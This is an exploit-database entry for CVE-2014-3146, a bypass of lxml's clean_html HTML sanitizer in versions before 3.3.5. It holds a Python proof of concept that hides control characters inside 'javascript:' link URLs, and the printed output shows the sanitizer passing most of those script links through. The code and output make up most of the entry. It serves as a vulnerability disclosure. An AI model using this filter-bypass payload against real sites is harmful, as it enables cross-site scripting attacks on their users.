[] NeoSense

lxml - 'clean_html' Security Bypass

Author: Maksim Kochkin
type: remote
platform: linux
port: 
date_added: 2014-04-15 
date_updated: 2016-01-03 
verified: 1 
codes: CVE-2014-3146;OSVDB-105975 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/67159/info

lxml is prone to a security-bypass vulnerability.

An attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks.

Versions prior to lxml 3.3.5 are vulnerable.

from lxml.html.clean import clean_html

html = '''\
<html>
<body>
<a href="javascript:alert(0)">
aaa</a>
<a href="javas\x01cript:alert(1)">bbb</a>
<a href="javas\x02cript:alert(1)">bbb</a>
<a href="javas\x03cript:alert(1)">bbb</a>
<a href="javas\x04cript:alert(1)">bbb</a>
<a href="javas\x05cript:alert(1)">bbb</a>
<a href="javas\x06cript:alert(1)">bbb</a>
<a href="javas\x07cript:alert(1)">bbb</a>
<a href="javas\x08cript:alert(1)">bbb</a>
<a href="javas\x09cript:alert(1)">bbb</a>
</body>
</html>'''

print clean_html(html)


Output:

<div>
<body>
<a href="">aaa</a>
<a href="javascript:alert(1)">
bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="">bbb</a>
</body>
</div>